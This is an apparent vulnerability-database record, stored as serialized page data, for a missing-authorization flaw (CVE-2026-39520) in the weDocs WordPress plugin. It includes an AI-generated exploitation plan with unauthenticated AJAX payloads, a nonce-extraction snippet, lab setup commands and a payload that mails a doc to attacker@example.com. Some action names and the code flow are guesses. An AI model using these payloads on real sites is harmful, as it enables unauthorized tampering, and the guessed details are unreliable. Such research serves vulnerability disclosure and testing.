[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fllwGrj0q_mXah1aoPv-0mCo1iZqV_qD3Tvse1oiecMw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":32},"CVE-2026-39520","wedocs-missing-authorization-2","weDocs \u003C= 2.1.18 - Missing Authorization","The weDocs plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.1.18. This makes it possible for unauthenticated attackers to perform an unauthorized action.","wedocs",null,"\u003C=2.1.18","2.2.1","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-25 00:00:00","2026-04-15 21:27:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff9af0471-adb0-42c6-8a7b-da7d28e5e3aa?source=api-prod",50,[22,23,24],"assets\u002Fbuild\u002F5f4138884ca3828fa2ff.svg","assets\u002Fbuild\u002Fblock.asset.php","assets\u002Fbuild\u002Fblock.js","researched",false,3,"# Exploitation Research Plan - CVE-2026-39520 (weDocs \u003C= 2.1.18)\n\n## 1. Vulnerability Summary\nThe **weDocs** plugin for WordPress is vulnerable to **Missing Authorization** in versions up to and including 2.1.18. This vulnerability exists because certain AJAX handlers registered via `wp_ajax_nopriv_` (accessible to unauthenticated users) fail to perform capability checks (e.g., `current_user_can()`) or lack proper nonce verification. \n\nBased on the plugin's functionality and the CVSS vector (Integrity: Low, Privileges: None), the vulnerability likely resides in functions that modify documentation structure, such as **reordering documentation** or **dismissing administrative notices**, allowing unauthenticated attackers to disrupt the knowledge base organization or suppress admin warnings.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `wedocs_organize_docs` (inferred) or `wedocs_reorder_posts` (inferred).\n- **Alternative Action**: `wedocs_dismiss_admin_notice` (inferred).\n- **HTTP Method**: `POST`\n- **Authentication**: None (Unauthenticated).\n- **Payload Parameters**:\n  - `action`: `wedocs_organize_docs`\n  - `order`: A serialized array or JSON string representing the new order of documentation IDs.\n  - `security` or `_wpnonce`: (May be required if check exists but is bypassable or if the nonce is public).\n\n## 3. Code Flow\n1. **Entry Point**: The plugin registers AJAX handlers in `includes\u002FAjax.php` (or similar) using:\n   `add_action( 'wp_ajax_nopriv_wedocs_organize_docs', [ $this, 'organize_docs' ] );`\n2. **Missing Check**: The function `organize_docs()` is executed. It lacks a `current_user_can( 'edit_posts' )` or `current_user_can( 'manage_options' )` check.\n3. **Sink**: The function processes the `$_POST['order']` parameter and updates the `menu_order` or `post_parent` fields in the `wp_posts` table for the specified IDs using `wp_update_post()`.\n\n## 4. Nonce Acquisition Strategy\nIf the endpoint requires a nonce, weDocs typically localizes script data into a global JavaScript variable. \n\n- **Trigger Shortcode**: The `wedocs-search` block (seen in `assets\u002Fbuild\u002Fblock.js`) or the main `[wedocs]` shortcode enqueues the necessary scripts.\n- **Variable Name**: `weDocsBlockVars` (identified in `block.js`) or `weDocs`.\n- **Extraction Method**:\n  1. Create a public page with the weDocs search block or shortcode.\n  2. Navigate to the page.\n  3. Use `browser_eval` to extract the nonce.\n\n**Actionable Extraction JS**:\n```javascript\n\u002F\u002F Check for both common localization patterns\nwindow.weDocsBlockVars?.nonce || window.weDocs?.nonce || window.weDocs?.ajax_nonce\n```\n\n## 5. Exploitation Strategy\n\n### Step 1: Discover Documentation IDs\nFirst, identify the IDs of existing documentation posts.\n- **Request**: `GET \u002F` (or use WP-CLI)\n- **Tool**: `http_request`\n\n### Step 2: Extract Nonce (If needed)\n- **Tool**: `browser_navigate` to a page containing the doc list or search.\n- **Tool**: `browser_eval` to get the nonce from `weDocsBlockVars`.\n\n### Step 3: Perform Unauthorized Action (Reorder Docs)\nSend a request to scramble the documentation hierarchy.\n- **Endpoint**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Payload**:\n  ```text\n  action=wedocs_organize_docs&order[0][id]=ID_OF_DOC_2&order[0][children][0][id]=ID_OF_DOC_1&security=EXTRACTED_NONCE\n  ```\n  *(Note: The exact structure of the `order` parameter should be verified if the plugin expects a JSON string or a flat array.)*\n\n### Step 4: Alternative Attack (Dismiss Notice)\nIf sorting fails, attempt to dismiss admin notices.\n- **Payload**:\n  ```text\n  action=wedocs_dismiss_admin_notice&notice=wedocs_review_notice\n  ```\n\n## 6. Test Data Setup\n1. **Create Parent Doc**: `wp post create --post_type=docs --post_title=\"Parent Doc\" --post_status=publish`\n2. **Create Child Doc**: `wp post create --post_type=docs --post_title=\"Child Doc\" --post_status=publish`\n3. **Verify Initial State**: `wp post list --post_type=docs --fields=ID,post_title,menu_order`\n4. **Place Block**: Create a page with the search block to ensure nonces are available:\n   `wp post create --post_type=page --post_title=\"Search\" --post_content='\u003C!-- wp:wedocs\u002Fwedocs-search \u002F-->' --post_status=publish`\n\n## 7. Expected Results\n- **Response**: The server should return a `200 OK` or a JSON success message (e.g., `{\"success\": true}`).\n- **Data Change**: The `menu_order` or `post_parent` of the targeted documentation posts will be modified despite the request being unauthenticated.\n\n## 8. Verification Steps\n1. **Check DB via WP-CLI**:\n   `wp post list --post_type=docs --fields=ID,post_title,menu_order,post_parent`\n2. **Compare**: Confirm the `menu_order` or hierarchy no longer matches the initial state created in \"Test Data Setup\".\n\n## 9. Alternative Approaches\nIf `wedocs_organize_docs` is not the correct action name:\n- **Scan for Actions**: Use `grep -r \"wp_ajax_nopriv_wedocs\" .` in the plugin directory to find all exposed actions.\n- **Search Analytics**: Look for `wedocs_search_analytics` which might allow clearing search logs.\n- **Email Doc**: Look for `wedocs_email_doc`. If vulnerable, attempt to send a document to an external email:\n  `action=wedocs_email_doc&to=attacker@example.com&id=DOC_ID` (This would demonstrate unauthorized use of the mail system).","gemini-3-flash-preview","2026-04-19 00:27:49","2026-04-19 00:29:31",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","2.1.18","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwedocs\u002Ftags\u002F2.1.18","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwedocs.2.1.18.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwedocs\u002Ftags\u002F2.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwedocs.2.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwedocs\u002Ftags"]